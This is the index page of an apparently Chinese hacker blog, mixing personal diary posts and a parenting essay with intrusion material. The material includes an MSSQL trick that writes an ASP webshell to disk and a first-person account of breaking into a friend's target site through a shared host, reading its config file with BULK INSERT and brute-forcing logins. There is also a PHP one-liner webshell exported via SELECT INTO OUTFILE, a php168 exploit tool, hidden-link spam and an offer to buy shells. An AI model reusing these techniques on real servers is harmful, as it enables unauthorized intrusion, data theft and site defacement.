预览模式: 普通 | 列表

做友情链接的朋友看一看(置顶)

create table hack(test image);
insert into hack (cmd) values ('┼硥捥瑵?敲畱獥?瘢污敵?┩>u');  
Select cmd into [a] in 'h:\wwwroot\hack41.cn\wwwroot\bbs\database\x.asp;a.xls' 'excel 8.0;' from hack

查看更多...

分类:技术文章 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 191

我们能拥有孩子多久?

3岁,她去上幼儿园了,看着她小小的坚强的背影,心中又喜悦又有点小小的心酸。离别了一整天,孩子看到你高兴得奔跑过来,扑在你的怀里。跟你说:妈妈,我想您了。那一刻,抱着孩子就像抱着了整个世界。
       6岁,她上小学了,孩子终于走进校门,这是多么值得纪念的事情,孩子的人生从此翻开了新的篇章,却没想到,这也是孩子离开我们的第一步。她已经对与你分开一天习以为常了,而且她喜欢每天去学校,这是她更喜欢的生活。甚至,她有时还会说:妈妈,在家好无聊,没有小朋友和我玩。
       12岁,她上初中了,甚至有的开始上寄宿学校,一个月或者几个月回一次家,见上一次面。他们开始不再依赖你,甚至,他们喜欢和你对着干。你想帮他们做点事情,他们说:妈妈,我自己来吧或者妈妈不要你陪了。突然觉得这句话让我们觉得好失落,孩子是不是不再需要我们了?
       18岁,她离开你去上大学,一年回来两次。回来的好几天前,家里的冰箱就装不下了,为她准备了各种各样她喜欢吃的东西。可是一回来打个照面,她就忙着和同学朋友聚会去了。从此,你最怕听到的一句话是:妈妈,我不回家吃饭了,你们自己吃吧。

查看更多...

Tags: 亲情

分类:情感&文学 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 260

记一次小小的入侵过程

BY:814ckhum0r
Site:www.hack41.cn
Team:B.H.S.T
转载请保留此段文字,牛牛就飘过吧.
近日帮朋友搞一个小站,本来以为很快就能搞定  结果花了不少时间。不得不说能力有限呀。
目标站点是老Y文章管理系统v2.5的。在网上找了下,目前基本上没有什么可直接利用的漏洞,于是开始旁注
http://ip.468w.cn/ 查了下。服务器上150个站,用super injection导入全部站点后批量扫描注入点,很快拿到了服务器一个asp的shell,可是权限很低.几分钟过后又拿到同服另外的一个.net站的shell,初步看了下,星外的虚拟主机,设置得比较安全,除了当前站点目录和c:\windows\temp可写入,找了许久都没找到一个即可写也可执行的目录。这样信息获取的就比较少了,所幸在注册表里HKEY_LOCAL_MACHINE\SYSTEM\LIWEIWENSOFT\INSTALLFREEADMIN\11找到了星外虚拟主机配置信息 mssql sa密码 (32位md5加密,感谢sht同学帮我查询收费记录)

1.jpg


,速度连接上去,
却没看到诸如freehost之类的数据库,sa被降权了,mysql 的root密码也是一样的可惜也被降权了,都是独立帐户启动的数据库.mssql backupdata时除了temp目录可写,其它目录都不能写,xp_cmdshell,xp_dirtree,xp_oacreate,等那些存储过程都不可用,上传相关dll文件尝试恢复提示拒绝访问,不过还可以用xp_subdirs列出d:\freehost的所有子目录来。但是目标web路径没有用域名这类的作为名称,花了大半天的时间才找到目标站的路径。大致方法就是通过whois查到管理员的qq邮箱,再通过搜索qq,找到管理员常用用户名xxx336,再在列出的子目录里找到一个xxx336的目录,exec master..xp_subdirs ‘d:\freehost\xxxx336\web’ 的确老y文章管理系统的目录结构不过后台目录被改了这下也暴露出来了,目前知道后台地址,web目录。Qq,常用用户名,把这些整理成一字典 进行后台密码和ftp穷举,也失败了。于是想打数据库的主意,老Y文章管理系统的配置文件为/inc/config.asp,的参数中有数据库路径,于是在网上相关 mssql读取文件内容的方法,总算是找到了,也许牛牛们早就知道了,但我还是第一次用到,拿出来分享下希望对没有接触过的同学有帮助以免走弯路,
用查询分析器执行如下语句
Use xxx120;--(这里是随便选的一个数据库)
drop table cmd;
create table cmd (a text);
BULK Insert cmd   
FROM 'd:\freehost\xxx336\web\inc\config.asp'   
WITH (   
    FIELDTERMINATOR = '\n',  
    ROWTERMINATOR = '\n\n'  
     
)   

select * from cmd
这样就成功读出了d:\freehost\xxx336\web\inc\config.asp文件的内容,很惊讶。
2.jpg



下载数据库后找到管理员表,密码字符串只有14位,下载了套程序看了下相关代码Mid(md5(Admin_Pass,32),4,18),先经过32位md5密码然后从4位开始往后取18位 。密码不可逆,看到这个就蛋疼了。看了看后台验证文件admin_check.asp, 很鸡肋cookies欺骗。利用起来很麻烦。于是在下载到的数据库的普通用户表中查询和管理员表的里密码相似的用户,结果还真找到了个用户,
3.jpg

查看更多...

分类:原创文章 | 固定链接 | 评论: 1 | 引用: 0 | 查看次数: 493

linux敏感文件

etc/httpd/conf/httpd.conf

/etc/rc.local   有时可以读出来apache的路径

查看更多...

Tags: linux tips load_file

分类:技术文章 | 固定链接 | 评论: 2 | 引用: 0 | 查看次数: 608
转至http://hi.baidu.com/system%5Fexp/blog/item/99b0de4b0ba8d22809f7efc8.html

UNIX网管员主要是靠系统的LOG,来获得入侵的痕迹.当然也有第三方工具记录入侵系统的 痕迹,UNIX系统存放LOG文件,普通位置如下:
/usr/adm - 早期版本的UNIX

查看更多...

分类:技术文章 | 固定链接 | 评论: 1 | 引用: 0 | 查看次数: 655

!!!!!

最近一段时间感觉总是在原地踏步    毕业快一年了  技术上还没有大的突破  每当看到牛人们的博客  自己就深深的惭愧... 很矛盾  答应朋友的事也拖拖拉拉 做事能力及效率也不见得怎么样    ....这就是我吗 ????真想去撞墙  ...很想哭  想大声喊叫  想去一个没有人的地方狂奔     难道这就是传说中的压力??~~

查看更多...

分类:个人日志 | 固定链接 | 评论: 2 | 引用: 0 | 查看次数: 602

百度。。。。

http://www.cnbeta.com/articles/101927.htm太牛x了。
貌似有的地方被解析到了荷兰  有的地方被解析到了雅虎。有的地方就解析不出来。。有的地方用户能够访问
.有的地方还是黑页。。
下面是临时访问方法

查看更多...

Tags: baidu 百度 被黑

分类:个人日志 | 固定链接 | 评论: 1 | 引用: 0 | 查看次数: 920

I am still aliving

我发现我还活着....N久没更新了....活动胫骨...just so so...
分类:个人日志 | 固定链接 | 评论: 3 | 引用: 0 | 查看次数: 960

php168最新漏洞利用工具(login.php)

都被牛淫们搞烂了
成功率太低了..试了10多个网站就一个成功 无聊就整了这东东出来 没多大用处  纯属装X 各位自鉴
据说php168还有N多0day,大家快去挖啊!!!

查看更多...

Tags: 0day

分类:原创软件 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1833

asp中调用fso设置文件属性

<%
w="\images\index.asp"
w=Server.MapPath("\")&w
set fso=createobject("scripting.filesystemobject")

查看更多...

Tags: asp fso 隐藏文件

分类:技术文章 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1635

本博pr 又恢复3了。。。。

前一个月pr由2跳到3,结果有一段时间不知道是服务器不稳定还是啥的 也可能是用webshell在人家站加了隐藏链接。。。google惩罚了我小站。。一下子pr就为0..那个郁闷丫~~~。今天心血来潮突然查看了下pr一下又是3 了。。呼呼~  。。happy一下。最近比较懒。天气也比较热。好久没有更新了。。来透透气~

查看更多...

分类:个人日志 | 固定链接 | 评论: 1 | 引用: 0 | 查看次数: 1364

fso测试

just for a test
分类:个人日志 | 固定链接 | 评论: 2 | 引用: 0 | 查看次数: 1334

blog安新家了

之前服务器一直不稳定。。。影响seo,现搬新服务器了。。。速度不错。。价格也不错。
分类:个人日志 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1259

aspxspy2.0

一次曲折入侵拿源代码过程

 By:blackhumor  [B.H.S.T] blog:www.hack41.cn

 一日晚,同学丢来个网址说要源代码+数据,当时有时间就打开看了下,网站是.net脚本,也不知道是采用的什么整站系统可能是找人做的,就简单的在几个带参数连接页面提交单引号,并没有返回想要的东东,

wwwscan扫描敏感目录,结果什么都没有扫描到

查看更多...

Tags: 入侵 提权

分类:原创文章 | 固定链接 | 评论: 3 | 引用: 0 | 查看次数: 2089

select into outfile导出webshell技巧

by:blackhumor,欢迎转载,请注明出处,谢谢!

在网上看到的都是先建立一个表。然后插入一句话木马。再查询并导出,经过我实验 其实不用建表 就可以导出文件的
比如我们进入了phpmyadmin,随便点击一个数据库,然后点击sql,接着执行select 0x3c3f706870206576616c28245f524551554553545b636d645d293b3f3e into outfile 'd:/xamp/www/ok.php'即可将一句话<?php eval($_REQUEST[cmd]);?>导出得到webshell.

查看更多...

分类:原创文章 | 固定链接 | 评论: 2 | 引用: 0 | 查看次数: 1902

Fatal error: Call to undefined function curl_init

使用curl_init的时候,要报错?Fatal error: Call to undefined function curl_init() in XX:\XX\XX\XX.php on line 3?
需要到哪里去设置呢?
第一:
找到php.ini

查看更多...

Tags: php

分类:技术文章 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1950

命令行下一种新的加系统帐户的方法

命令行下一种新的加帐号的方法
From:http://huaidan.org/archives/3199.html

作者:lcx

查看更多...

分类:技术文章 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1510
刘谦 刘亦菲 刘谦博客 黑链 免费VPS shell收购 刘谦 刘亦菲 刘谦博客 黑链 免费VPS shell收购